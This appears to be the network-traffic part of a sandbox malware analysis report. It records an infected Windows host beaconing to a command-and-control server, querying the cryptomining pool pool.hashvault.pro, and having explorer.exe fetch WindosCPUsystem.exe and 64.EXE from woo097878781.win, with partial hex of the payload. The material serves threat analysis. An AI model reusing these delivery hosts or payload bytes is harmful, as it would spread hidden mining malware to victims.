                                                                          Dec 8, 2024 15:10:35.037605047 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:35.127401114 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:36.041966915 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:36.127382994 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:37.058079004 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:37.127441883 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:38.068953037 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:38.127388954 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:39.086860895 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:39.127373934 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:39.658318996 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:10:39.814887047 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:10:40.093776941 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:40.314886093 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:41.107647896 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:41.314872980 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:41.813702106 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.815042973 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.815057993 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.816117048 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.816214085 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.818063021 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.818135977 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.818217993 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.818227053 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:41.818293095 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:41.863347054 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:42.120996952 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:42.314893961 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:42.374172926 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:42.374259949 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:42.374332905 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:42.377739906 CET50021443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:10:42.377752066 CET44350021154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:10:43.118530989 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:43.314961910 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:44.130611897 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:44.314870119 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:45.131211042 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:45.330521107 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:46.188922882 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:46.314904928 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:47.201932907 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:47.314891100 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:48.213200092 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:48.314888954 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:49.215241909 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:49.314982891 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:50.217817068 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:50.314898014 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:51.215512037 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:51.314927101 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:52.228943110 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:52.314951897 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:53.281121016 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:53.424351931 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:54.282658100 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:54.330682993 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:55.293175936 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:55.424290895 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:56.309956074 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:56.424412012 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:57.310029984 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:57.424428940 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:58.332385063 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:58.424346924 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:10:59.333733082 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:10:59.424354076 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:00.346745968 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:00.424310923 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:01.359802008 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:01.424324989 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:01.623574972 CET33334977337.203.243.102192.168.2.6
                                                                          Dec 8, 2024 15:11:01.814953089 CET497733333192.168.2.637.203.243.102
                                                                          Dec 8, 2024 15:11:02.366745949 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:02.424359083 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:03.377763033 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:03.424321890 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:04.386868954 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:04.627459049 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:05.401735067 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:05.518162966 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:06.412826061 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:06.627510071 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:07.420294046 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:07.627532959 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:08.420360088 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:08.627486944 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.297825098 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.297960043 CET500155200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.298002005 CET500185200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.298005104 CET500175200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.298005104 CET500195200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.298019886 CET500205200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.417932987 CET520050014185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418021917 CET500145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418718100 CET520050015185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418766975 CET500155200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418813944 CET520050018185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418850899 CET520050017185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418853045 CET500185200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418899059 CET500175200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418931007 CET520050020185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418941975 CET520050019185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:09.418983936 CET500205200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:09.418994904 CET500195200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:13.388950109 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:13.508637905 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:13.508733988 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:13.508924007 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:13.628278017 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:15.361413002 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:15.361596107 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:15.486802101 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:16.063585043 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:16.063697100 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:16.183371067 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:16.183485031 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:16.303426027 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:17.202559948 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:17.202657938 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:17.322174072 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:17.322252035 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:17.441782951 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:18.338227987 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:18.518130064 CET500235200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:11:18.772299051 CET520050023185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:11:18.814981937 CET500235200192.168.2.6185.157.162.216
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 15:07:02.100255966 CET | 63429 | 53 | 192.168.2.6 | 1.1.1.1
Dec 8, 2024 15:07:02.745273113 CET | 53 | 63429 | 1.1.1.1 | 192.168.2.6
Dec 8, 2024 15:07:33.500243902 CET | 64191 | 53 | 192.168.2.6 | 1.1.1.1
Dec 8, 2024 15:07:33.751643896 CET | 53 | 64191 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 8, 2024 15:07:02.100255966 CET | 192.168.2.6 | 1.1.1.1 | 0xc6e4 | Standard query (0) | woo097878781.win | A (IP address) | IN (0x0001) | false
Dec 8, 2024 15:07:33.500243902 CET | 192.168.2.6 | 1.1.1.1 | 0x58b4 | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 8, 2024 15:07:02.745273113 CET | 1.1.1.1 | 192.168.2.6 | 0xc6e4 | No error (0) | woo097878781.win | (none) | 154.216.20.243 | A (IP address) | IN (0x0001) | false
Dec 8, 2024 15:07:33.751643896 CET | 1.1.1.1 | 192.168.2.6 | 0x58b4 | No error (0) | pool.hashvault.pro | (none) | 5.188.137.200 | A (IP address) | IN (0x0001) | false
Dec 8, 2024 15:07:33.751643896 CET | 1.1.1.1 | 192.168.2.6 | 0x58b4 | No error (0) | pool.hashvault.pro | (none) | 37.203.243.102 | A (IP address) | IN (0x0001) | false
• woo097878781.win
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49738 | 154.216.20.243 | 443 | 5020 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-08 14:07:25 UTC | 223 | OUT | GET /WindosCPUsystem.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: woo097878781.win
2024-12-08 14:07:25 UTC | 275 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Dec 2024 14:07:25 GMT
Content-Type: application/x-msdos-program
Content-Length: 2590208
Last-Modified: Sat, 07 Dec 2024 18:58:16 GMT
Connection: close
ETag: "67549ac8-278600"
X-Powered-By: PleskLin
Accept-Ranges: bytes
2024-12-08 14:07:25 UTC | 16109 | IN | Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 b3 9a 54 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 7a 00 00 00 08 27 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 27 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdTg"z'@@'`
2024-12-08 14:07:25 UTC | 16384 | IN | Data Raw: ce 00 00 00 66 0f 6f 05 b7 4d 00 00 66 0f 6f 15 bf 4b 27 00 66 0f fd d0 66 0f 6f 0d e3 4a 00 00 66 0f db d1 66 0f 7f 15 a7 4b 27 00 66 0f 6f 15 af 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 9f 4b 27 00 66 0f 6f 15 a7 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 97 4b 27 00 66 0f 6f 15 9f 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 8f 4b 27 00 66 0f 6f 15 97 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 87 4b 27 00 66 0f 6f 15 8f 4b 27 00 66 0f fd d0 66 0f db d1 66 0f 7f 15 7f 4b 27 00 66 0f fd 05 87 4b 27 00 66 0f db c1 66 0f 7f 05 7b 4b 27 00 8b 05 85 4b 27 00 83 c0 63 0f b6 c0 66 89 05 78 4b 27 00 c6 05 73 4b 27 00 00 80 3d 19 44 27 00 00 0f 84 1f 1e 00 00 80 3d 7f 4b 27 00 00 74 3a 66 0f 6f 05 63 4b 27 00 66 0f fd 05 cb 4c 00 00 66 0f db 05 03 4a 00
                                                                          Data Ascii: foMfoK'ffoJffK'foK'fffK'foK'fffK'foK'fffK'foK'fffK'foK'fffK'fK'ff{K'K'cfxK'sK'=D'=K't:focK'fLfJ
                                                                          2024-12-08 14:07:25 UTC16384INData Raw: 20 28 44 4f 4d 41 49 4e 29 00 41 72 67 75 6d 65 6e 74 20 73 69 6e 67 75 6c 61 72 69 74 79 20 28 53 49 47 4e 29 00 4f 76 65 72 66 6c 6f 77 20 72 61 6e 67 65 20 65 72 72 6f 72 20 28 4f 56 45 52 46 4c 4f 57 29 00 50 61 72 74 69 61 6c 20 6c 6f 73 73 20 6f 66 20 73 69 67 6e 69 66 69 63 61 6e 63 65 20 28 50 4c 4f 53 53 29 00 54 6f 74 61 6c 20 6c 6f 73 73 20 6f 66 20 73 69 67 6e 69 66 69 63 61 6e 63 65 20 28 54 4c 4f 53 53 29 00 54 68 65 20 72 65 73 75 6c 74 20 69 73 20 74 6f 6f 20 73 6d 61 6c 6c 20 74 6f 20 62 65 20 72 65 70 72 65 73 65 6e 74 65 64 20 28 55 4e 44 45 52 46 4c 4f 57 29 00 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 00 5f 6d 61 74 68 65 72 72 28 29 3a 20 25 73 20 69 6e 20 25 73 28 25 67 2c 20 25 67 29 20 20 28 72 65 74 76 61 6c 3d 25 67 29 0a 00 00 00
                                                                          Data Ascii: (DOMAIN)Argument singularity (SIGN)Overflow range error (OVERFLOW)Partial loss of significance (PLOSS)Total loss of significance (TLOSS)The result is too small to be represented (UNDERFLOW)Unknown error_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 3f 35 32 33 24 36 17 22 23 19 05 46 14 03 3a 08 0c 1d 45 20 26 07 04 33 20 3d 22 45 4f 14 30 4f 00 0f 04 0a 20 07 55 01 5a 37 1d 46 35 34 5e 18 3c 5a 15 22 29 1f 08 0d 45 16 5a 0a 3b 47 0e 2a 2e 29 46 24 30 14 0c 2a 0e 0b 23 3e 00 56 2b 18 1c 18 04 0c 27 1e 2a 29 45 1d 14 23 3a 07 3b 28 2c 0d 02 0e 41 05 57 01 1d 22 1e 3d 1f 09 5c 3e 07 3b 1b 2b 05 47 0d 33 3f 2a 38 0a 3d 1f 04 34 3a 2f 09 5b 3c 3a 26 1f 50 23 31 44 35 20 19 29 20 1b 45 08 08 34 59 36 39 33 1e 15 32 1a 26 3d 1d 34 21 21 3a 18 2a 3f 19 02 45 43 00 1a 07 03 03 00 47 0a 58 0a 1b 36 20 12 0d 1d 17 1a 59 41 20 0d 23 13 32 1c 4b 33 1d 14 59 2c 0b 38 06 1f 02 5a 02 3c 15 25 2b 17 30 16 3d 08 21 3d 2b 19 5f 29 02 21 2e 0a 06 1d 5a 24 1e 59 1c 37 04 48 06 1d 0a 00 00 35 20 0f 2a 0e 4c 38 08 39 1e
                                                                          Data Ascii: ?523$6"#F:E &3 ="EO0O UZ7F54^<Z")EZ;G*.)F$0*#>V+'*)E#:;(,AW"=\>;+G3?*8=4:/[<:&P#1D5 ) E4Y6932&=4!!:*?ECGX6 YA #2K3Y,8Z<%+0=!=+_)!.Z$Y7H5 *L89
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 01 51 09 26 52 5e 07 09 31 21 3f 2e 21 18 1f 49 1c 01 04 37 2c 16 1e 49 44 52 11 07 17 10 1b 36 2a 32 35 50 28 38 3e 21 2e 22 3e 1d 1f 59 26 18 22 48 1e 02 1f 28 1f 09 47 30 33 43 4a 35 11 3a 35 15 13 24 03 1e 36 29 2c 27 45 10 47 28 45 37 17 0b 3b 3d 01 1a 5d 20 0a 0b 43 3c 1d 2b 31 0f 3a 17 3c 2a 29 55 51 5c 03 05 0e 07 1f 2a 18 38 3a 5e 05 01 06 08 5e 31 3f 31 25 34 16 3a 11 20 0e 2e 49 26 0c 00 1d 3a 21 27 42 3b 3e 14 25 41 47 45 17 0a 5d 1a 2e 19 34 2c 46 21 12 37 1d 40 27 10 2b 0b 5d 22 1d 26 33 1d 13 22 01 38 27 14 3c 01 3b 05 1a 20 21 17 28 36 4d 1f 3b 43 19 35 07 1d 03 20 0c 0d 12 2c 0e 40 4f 07 07 00 2d 17 13 5a 14 0d 08 3b 0c 38 1d 38 42 16 2e 26 1a 19 07 38 05 30 38 14 1c 52 07 44 26 15 22 2c 39 40 3e 44 47 21 0d 3c 1e 31 38 3a 0c 43 00 21 59
                                                                          Data Ascii: Q&R^1!?.!I7,IDR6*25P(8>!.">Y&"H(G03CJ5:5$6),'EG(E7;=] C<+1:<*)UQ\*8:^^1?1%4: .I&:!'B;>%AGE].4,F!7@'+]"&3"8'<; !(6M;C5 ,@O-Z;88B.&808RD&",9@>DG!<18:C!Y
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 0d 4f 2b 23 2c 55 2b 28 3e 41 1c 14 44 01 07 40 59 28 19 24 01 07 11 2b 15 4d 42 59 09 3b 23 28 5e 0c 34 58 5b 58 3c 3a 1d 19 2e 19 26 37 01 3a 47 45 22 26 39 4a 19 4d 18 52 22 06 1f 09 3a 12 35 39 2b 13 27 26 23 2c 22 1b 47 3b 1c 01 59 52 3d 49 41 45 25 35 1d 49 22 2a 24 28 2d 35 3d 1f 07 16 00 2f 0b 2d 07 1e 28 45 25 0c 33 27 2b 37 07 3c 29 36 01 02 0e 10 37 21 40 3b 21 35 0a 57 16 09 18 23 24 0f 57 2e 10 05 3a 46 26 2d 5b 1e 1a 29 31 08 5f 14 59 18 1c 1c 04 17 16 1b 1d 3a 28 20 29 3b 05 5f 34 0d 0d 01 00 05 19 16 21 0a 27 5a 23 3b 2b 03 0e 4a 3a 3c 2c 27 30 29 07 57 39 03 1c 0f 09 5d 37 5c 30 14 39 5d 1f 5e 3c 38 1d 15 44 2d 19 17 25 49 06 34 1f 13 34 26 11 35 1a 23 09 08 5c 3b 54 26 1f 08 04 44 13 59 58 2d 15 33 08 1c 2a 39 05 2e 26 09 47 1f 10 00 20
                                                                          Data Ascii: O+#,U+(>AD@Y($+MBY;#(^4X[X<:.&7:GE"&9JMR":59+'&#,"G;YR=IAE%5I"*$(-5=/-(E%3'+7<)67!@;!5W#$W.:F&-[)1_Y:( );_4!'Z#;+J:<,'0)W9]7\09]^<8D-%I44&5#\;T&DYX-3*9.&G
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 3e 19 30 2a 52 36 1e 0d 26 17 00 3c 01 2d 1f 01 15 40 1e 36 0d 3f 1a 2b 2a 34 02 02 2b 41 1e 19 19 00 5e 06 24 3c 36 1e 21 0b 3e 30 16 5c 00 38 03 2b 00 29 3d 59 24 09 08 4c 39 59 2e 1a 0d 53 2c 0d 10 42 12 0a 2f 52 1d 3f 39 32 22 1a 1c 38 1c 01 28 1f 58 45 23 0c 1e 2a 32 16 13 0a 00 1c 3a 22 1a 3f 3d 21 11 52 1d 16 1e 12 45 14 1d 14 22 13 19 01 17 46 19 22 3d 10 3b 24 13 2b 5b 29 27 18 40 50 08 27 2e 0e 3d 38 41 1b 59 2b 22 48 20 1c 05 58 3c 2b 38 4f 19 1a 36 0b 1f 30 5d 0c 3c 36 02 18 01 47 11 40 07 1c 1e 4e 44 03 02 30 1a 01 13 0c 24 17 1a 3d 22 1c 00 41 1f 03 46 1b 06 33 15 18 06 28 3e 18 11 23 03 45 45 5e 05 21 34 06 35 3f 1b 30 5e 1b 43 4f 1c 17 11 09 13 4d 5f 12 3a 10 5e 1b 2f 31 25 34 3c 13 26 59 19 2c 3b 48 29 37 1e 33 20 48 40 4b 36 06 2e 1f 02
                                                                          Data Ascii: >0*R6&<-@6?+*4+A^$<6!>0\8+)=Y$L9Y.S,B/R?92"8(XE#*2:"?=!RE"F"=;$+[)'@P'.=8AY+"H X<+8O60]<6G@ND0$="AF3(>#EE^!45?0^COM_:^/1%4<&Y,;H)73 H@K6.
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 0e 3f 25 05 5a 54 0b 59 24 1b 01 46 10 21 5d 13 25 23 5f 3d 07 3a 1f 2b 23 28 14 25 21 3e 51 35 37 2d 26 07 45 04 3e 2c 3d 34 46 24 30 1e 37 0b 47 3b 22 5a 1c 01 46 20 14 17 12 3d 0d 35 13 30 57 33 30 08 3c 29 09 5e 01 23 25 47 00 3c 2c 1d 19 19 15 05 2b 3c 13 19 14 2c 20 40 0f 1c 5a 0a 2c 1d 08 19 2c 5a 11 18 5b 1e 1d 24 21 16 5a 03 47 3d 3c 5a 18 05 39 0f 22 3f 4c 01 14 46 2e 2e 2a 32 48 0f 12 22 26 27 1e 21 25 39 1f 45 27 3d 2c 07 0a 14 57 3b 26 2e 36 52 38 18 0b 29 46 41 05 0a 5a 27 13 1f 0a 04 0b 38 04 41 3a 1b 27 0b 03 16 1a 34 5c 3b 5c 49 3a 35 10 33 31 39 2c 35 02 34 0b 2d 3d 5d 0d 3b 2b 05 3d 01 37 2f 14 48 18 32 08 1a 5f 47 2d 22 35 0b 1e 17 2f 29 33 4d 5c 14 01 1b 5b 59 06 52 21 05 06 47 43 2a 07 17 3d 1e 49 36 0e 11 0d 13 1e 33 03 23 38 42 5c
                                                                          Data Ascii: ?%ZTY$F!]%#_=:+#(%!>Q57-&E>,=4F$07G;"ZF =50W30<)^#%G<,+<, @Z,,Z[$!ZG=<Z9"?LF..*2H"&'!%9E'=,W;&.6R8)FAZ'8A:'4\;\I:5319,54-=];+=7/H2_G-"5/)3M\[YR!GC*=I63#8B\
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 1a 4a 0b 19 58 20 37 0f 02 05 38 2c 39 36 1f 1c 23 45 05 39 09 26 28 2e 45 1e 01 5d 2a 35 1c 19 3d 13 3c 38 02 22 0f 0f 1f 05 23 41 21 02 14 1b 33 21 2a 01 2c 47 27 32 25 18 36 19 2b 11 2b 19 1c 1e 00 1b 20 0e 5c 31 25 49 46 39 15 59 01 28 3e 1f 09 1d 29 2a 5e 31 41 56 00 31 30 32 26 1d 06 3f 3f 0b 41 16 21 2c 27 17 2e 43 00 59 5a 13 35 14 44 21 2e 14 5b 4b 22 00 0c 3d 34 40 04 2e 08 1c 2b 30 21 26 11 0f 1d 1c 32 24 38 2a 37 0b 35 47 1e 03 5e 00 13 1f 3f 3d 1d 00 1e 03 03 11 5f 29 06 07 05 06 25 09 08 03 46 31 18 3c 05 40 32 02 1c 59 02 04 1a 51 25 4b 41 4a 17 30 22 3d 2c 34 29 0a 26 36 4f 24 3e 40 1f 21 31 16 36 23 32 41 45 0c 2b 22 5f 33 13 00 27 23 2e 11 01 4b 02 30 3d 5f 1c 00 12 0f 2e 46 00 12 3c 09 02 3b 45 1c 37 3b 1e 31 2b 18 40 09 04 25 2f 42 2a
                                                                          Data Ascii: JX 78,96#E9&(.E]*5=<8"#A!3!*,G'2%6++ \1%IF9Y(>)*^1AV102&??A!,'.CYZ5D!.[K"=4@.+0!&2$8*75G^?=_)%F1<@2YQ%KAJ0"=,4)&6O$>@!16#2AE+"_3'#.K0=_.F<;E7;1+@%/B*
                                                                          2024-12-08 14:07:26 UTC16384INData Raw: 1f 2f 3b 2f 1d 5f 54 29 2d 2b 18 10 3f 0d 37 2a 17 46 2a 1d 1f 1e 5d 2f 3b 28 26 11 1e 1a 0c 57 3b 38 19 24 0b 43 54 26 2c 29 06 13 25 1b 3c 41 3a 33 3c 37 28 33 5f 4c 3a 41 3f 28 36 1e 59 12 28 02 35 3c 1c 24 2a 11 01 44 03 1f 1b 38 0b 23 3f 24 08 20 5f 33 2b 10 41 20 00 35 3b 45 23 21 3a 2d 1d 1c 00 0e 29 18 5e 1b 1d 17 34 08 17 40 0c 10 18 06 03 0b 19 38 1d 03 5a 24 4a 35 51 3a 28 16 5e 51 18 1b 2b 08 42 15 26 00 17 5d 34 52 4f 35 19 18 04 42 21 19 4b 36 43 20 09 45 1c 3b 0d 0c 42 5e 45 1a 5d 09 24 09 3d 01 08 1d 27 2e 27 27 42 58 20 10 39 10 06 28 40 21 35 15 05 20 5a 38 3e 04 1c 59 35 38 3d 21 18 10 10 02 56 08 1c 17 41 1c 3d 15 1c 3d 04 41 0d 11 1a 34 02 21 2b 03 3c 38 1f 34 25 44 13 49 27 0f 4a 5a 5e 3c 18 49 45 20 56 31 0e 09 27 1a 10 19 13 1c 46
                                                                          Data Ascii: /;/_T)-+?7*F*]/;(&W;8$CT&,)%<A:3<7(3_L:A?(6Y(5<$*D8#?$ _3+A 5;E#!:-)^4@8Z$J5Q:(^Q+B&]4RO5B!K6C E;B^E]$='.''BX 9(@!5 Z8>Y58=!VA==A4!+<84%DI'JZ^<IE V1'F


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49756 | 154.216.20.243 | 443 | 5020 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-08 14:07:31 UTC | 171 | OUT | GET /64.EXE HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Host: woo097878781.win
2024-12-08 14:07:32 UTC | 274 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:07:32 GMT
                                                                          Content-Type: application/x-msdos-program
                                                                          Content-Length: 1021952
